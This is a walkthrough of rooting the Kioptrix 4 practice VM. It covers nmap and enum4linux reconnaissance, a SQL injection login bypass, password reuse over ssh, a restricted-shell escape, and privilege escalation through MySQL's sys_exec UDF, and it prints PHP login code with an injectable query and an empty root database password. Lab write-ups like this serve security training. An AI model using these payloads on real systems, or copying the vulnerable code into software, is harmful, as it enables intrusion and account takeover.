Overview
Kioptrix 4 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise
Vulnerabilities Exploited:
- SQL Injection in website admin panel
- Website user password reused for secure shell
- Website connected with mysql database with root credentials
- System procedure availble for execution through lib_mysqludf_sys.so
Lab Setup:
- VMWare workstation for Virtual Machines
- Kali Linux VM in Bridge mode
- Kioptrix 4 in Bridge mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
Reconnaissance/Scanning
#netdiscover
_____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.8.100 84:3a:4b:5c:f5:54 1 60 Intel Corporate 192.168.8.108 00:0c:29:89:0d:50 1 60 VMware, Inc. 192.168.8.1 14:a5:1a:c3:5a:cc 14 840 HUAWEI TECHNOLOGIES CO.,LTD
Target VM IP Address: 192.168.8.108
Lets Scan target box with nmap to find open ports, and services listening on those ports.
root@kali:~# nmap -p- -A 192.168.8.108 Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-30 07:57 EDT Nmap scan report for 192.168.8.108 Host is up (0.00035s latency). Not shown: 39528 closed ports, 26003 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0) | ssh-hostkey: | 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA) |_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA) 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) |_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch |_http-title: Site doesn't have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP) MAC Address: 00:0C:29:89:0D:50 (VMware) Device type: general purpose Running: Linux 2.6.X OS CPE: cpe:/o:linux:linux_kernel:2.6 OS details: Linux 2.6.9 - 2.6.33 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 6h59m58s, deviation: 2h49m43s, median: 4h59m57s |_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Unix (Samba 3.0.28a) | Computer name: Kioptrix4 | NetBIOS computer name: | Domain name: localdomain | FQDN: Kioptrix4.localdomain |_ System time: 2018-05-30T12:58:29-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE HOP RTT ADDRESS 1 0.35 ms 192.168.8.108 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.70 seconds
Nmap Findings:
- Target box is linux machine
- Secure shell on port 22
- Website on port 80
- and Samba server at 445
With sql injection we bypassed authentication, but there is no page for user account “admin”
admin:garbag’ or 1=1 — –
So, we need to enumerate user accounts first. Lets use enum4linux.
root@kali:~# enum4linux 192.168.8.108 Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 30 08:12:46 2018 ========================== | Target Information | ========================== Target ........... 192.168.8.108 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ===================================================== | Enumerating Workgroup/Domain on 192.168.8.108 | ===================================================== [+] Got domain/workgroup name: WORKGROUP ============================================= | Nbtstat Information for 192.168.8.108 | ============================================= Looking up status of 192.168.8.108 KIOPTRIX4 <00> - B <ACTIVE> Workstation Service KIOPTRIX4 <03> - B <ACTIVE> Messenger Service KIOPTRIX4 <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name MAC Address = 00-00-00-00-00-00 ====================================== | Session Check on 192.168.8.108 | ====================================== [+] Server 192.168.8.108 allows sessions using username '', password '' ============================================ | Getting domain SID for 192.168.8.108 | ============================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ======================================= | OS information on 192.168.8.108 | ======================================= Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464. [+] Got OS info for 192.168.8.108 from smbclient: [+] Got OS info for 192.168.8.108 from srvinfo: KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu) platform_id : 500 os version : 4.9 server type : 0x809a03 ============================== | Users on 192.168.8.108 | ============================== index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null) index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null) index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null) index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null) index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null) user:[nobody] rid:[0x1f5] user:[robert] rid:[0xbbc] user:[root] rid:[0x3e8] user:[john] rid:[0xbba] user:[loneferret] rid:[0xbb8] ...
Found 3 users, john, robert, loneferret.
Exploitation
Lets bypass authentication with username john.
john:garbag’ or 1=1 — –
Lets reuse john’s credentials over ssh.
root@kali:~# ssh john@192.168.8.108
The authenticity of host '192.168.8.108 (192.168.8.108)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.8.108' (RSA) to the list of known hosts.
john@192.168.8.108's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ python -c "import pty; pty.spawn('/bin/bash');"
*** forbidden syntax -> "python -c "import pty; pty.spawn('/bin/bash');""
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
john:~$
We are presented with restricted shell.
Lets break shell restrictions with echo os.system(“/bin/bash”)
john:~$ echo os.system("/bin/bash")
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=115(admin),1001(john)
john@Kioptrix4:~$
Privilege Escalation
So, our next step is to root linux machine. Lets search for UDF library. UDF library is used to interact with system from with in mysql environment.
john@Kioptrix4:~$ whereis lib_mysqludf_sys.so lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so john@Kioptrix4:~$
Database credentials found in checklogin.php
john@Kioptrix4:/var/www$ cat checklogin.php
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
// Define $myusername and $mypassword
$myusername=$_POST['myusername'];
$mypassword=$_POST['mypassword'];
// To protect MySQL injection (more detail about MySQL injection)
$myusername = stripslashes($myusername);
//$mypassword = stripslashes($mypassword);
$myusername = mysql_real_escape_string($myusername);
//$mypassword = mysql_real_escape_string($mypassword);
//$sql="SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'";
$result=mysql_query("SELECT * FROM $tbl_name WHERE username='$myusername' and password='$mypassword'");
//$result=mysql_query($sql);
// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row
if($count!=0){
// Register $myusername, $mypassword and redirect to file "login_success.php"
session_register("myusername");
session_register("mypassword");
header("location:login_success.php?username=$myusername");
}
else {
echo "Wrong Username or Password";
print('<form method="link" action="index.php"><input type=submit value="Try Again"></form>');
}
ob_end_flush();
?>
Database credentials are user:”root”, password:”” with empty password
Lets log into mysql and make john administrator/root
john@Kioptrix4:/var/www$ mysql -u root@localhost -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 28
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL |
+--------------------------------------+
1 row in set (0.01 sec)
mysql> exit
Bye
Lets confirm root access.
john@Kioptrix4:/var/www$ sudo su [sudo] password for john: root@Kioptrix4:/var/www# whoami root root@Kioptrix4:/var/www# id uid=0(root) gid=0(root) groups=0(root)
roooooooooootz:)
References
https://www.vulnhub.com/entry/kioptrix-level-13-4,25/
http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html
Zeeshan Sahi's blog 